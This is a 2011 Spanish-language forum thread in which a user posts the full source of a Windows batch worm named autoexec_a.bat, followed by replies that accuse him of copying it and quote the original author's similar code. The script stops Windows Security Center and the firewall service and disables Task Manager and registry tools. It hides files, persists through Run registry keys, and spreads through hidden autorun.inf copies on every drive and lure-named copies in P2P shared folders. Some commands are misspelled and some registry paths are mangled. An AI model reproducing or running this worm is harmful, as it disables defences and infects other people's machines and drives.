virus autoexec_a.bat

Iniciado por W4rR3d, 3 Febrero 2011, 22:50 PM

0 Miembros y 1 Visitante están viendo este tema.

W4rR3d

 me gusta la programacion en batch y en visual besic script y un poco de seguridad informatica. aca les dejo una de mis creaciones espero que lo corrijan si ven un error
su amigo W4rR3d  - AAHH. San Martin- Av. maria galan - Piura -Peru
este virus informatico se llama autoexec_a.bat, esta creado en batch

Código (dos) [Seleccionar]
@echo off
:: este virus fue creado por hacked by W4rR3d
:: este virus esta dedicado a la comunidad hacker piura- peru
msg * hacked by -={W4rR3d}=-
Set inic= %programfiles%
tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
net stop "Security Center"
net stop "centro de seguridad"
net stop "SharedAccess"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 1 /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v CheckedValue /t reg_dword /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /t REG_DWORD /d 2 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t REG_DWORD /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
for /F %%- in (MSMemoticon,PhotoshopCS4,FreeXXXPhotos,Office2009,VideosCaidasHumor,videosporn,wallpapers,wormgenerator) do (call :p2prop %%-)
copy /y "%0" "%homedrive%\autoexec_a.bat">nul 2>&1
reg add hklm\software\microsoft\windows\currentversion\run /v systemwar /t reg_sz /d %homedrive%\autoexec_a.bat /f
echo.[Autorun] >> %homedrive%\Autorun.inf
echo.label=Pendrive >> %homedrive%\Autorun.inf
echo.action=Abrir Pendrive >> %homedrive%\Autorun.inf
echo.shellexecute="/autoexec_a.bat" >> %homedrive%\Autorun.inf
for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
copy /Y "%0" "%%#:\autoexec_a.bat">nul 2>&1
attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
attrib +R +S +H "%%#:\autoexec_a.bat">nul 2>&1
)
(echo.^<HTML^>
echo.%^<HEAD^>
echo.^<title^>HACKED BY W4rR3d^</title^>
echo.^</HEAD^>
echo.^<BODY^>
echo.^<H1^>         ~~~HACKED BY W4rR3d~~~
echo.^</BODY^>
echo.^</HTML^>)>%homedrive%\IDEAS.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ddjsys /t REG_SZ /d %homedrive%\IDEAS.HTML
)
start %homedrive%\IDEAS.HTML
:p2prop
set var=%1
copy /y "%0" "%inic%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\ICQ\shared files\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Shareaza\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\eMule\Incoming\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Filetopia3\Files\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\XoloX\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Gnucleus\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\LimeWire\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Grokster\My Grokster\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Overnet\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Swaptor\Download\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Tesla\Files\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\BearShare\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Rapigator\Share\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\KMD\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\appleJuice\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
goto:eof

xassiz~

Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:

kingdarnakes

Cita de: pablomi en  3 Febrero 2011, 22:57 PM
Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:

Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.

xassiz~

#3
Cita de: kingdarnakes en  3 Febrero 2011, 23:12 PM
Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.

En el código original no era IDEAS.html, era IEAS:
Código (dos) [Seleccionar]

:IEAS
(ECHO.^<HTML^>
ECHO.^<HEAD^>
ECHO.^<title^>HACKED BY [antiguo_nick_mio]^</title^>
ECHO.^</HEAD^>
ECHO.^<BODY^>
ECHO.^<H1^>                  ~~~HACKED BY [antiguo_nick_mio]~~~
ECHO.^</BODY^>
ECHO.^</HTML^>)>%HOMEDRIVE%\IEAS.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v aErx_sys /t REG_SZ /d "%HOMEDRIVE%\IEAS.HTML"
ATTRIB +H %HOMEDRIVE\IEAS.HTML
GOTO:EOF



Esta linea:
Código (dos) [Seleccionar]
tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
copiada tal cual de otro virus mío que llamé "BaTr00t_a".

Código (dos) [Seleccionar]
for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
copy /Y "%0" "%%#:\baTr00t_a.bat">nul 2>&1
attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
attrib +R +S +H "%%#:\baTr00t_a.bat">nul 2>&1
)

Lo mismo con esta parte, que el ripper no fue muy hábil porque como podeis ver en el código tiene puesto autoexec_a (conservando el _a).


Y esta parte:
Código (dos) [Seleccionar]

:p2prop
set var=%1
copy /y "%0" "%programfiles%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\ICQ\shared files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Shareaza\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\eMule\Incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Filetopia3\Files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\XoloX\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Gnucleus\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\LimeWire\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Grokster\My Grokster\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Overnet\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Swaptor\Download\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Tesla\Files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\BearShare\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Rapigator\Share\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KMD\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\appleJuice\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
goto:eof

Ya ni siquiera se molestó en modificarla.


La creación del autorun.inf lo mismo.



En realidad todo es mío, solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.


No aporto links para no hacer spam, pero en google podeis encontrarlo.

Pero vamos, que me da igual, que sigan rippeando, así llegarán lejos.


Saludos!

kingdarnakes

Doy fe de ello... Ahora mismo lo acabo de comprobar...

Citarsolo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.

No sabría para que se usaba esa parte de código o no le gustaría y por eso la borro  :silbar:.

Lastima que no pueda reportar el mensaje a un moderador, espero que lo vea alguno, odio a los ripper...  >:D

leogtz

Código (dos) [Seleccionar]
tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1

Es taskkill, no tasskill ni taskill.

Bueno, cierro el tema, no aployo el plagio de código, además de que los "virus" en Batch son una *****.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com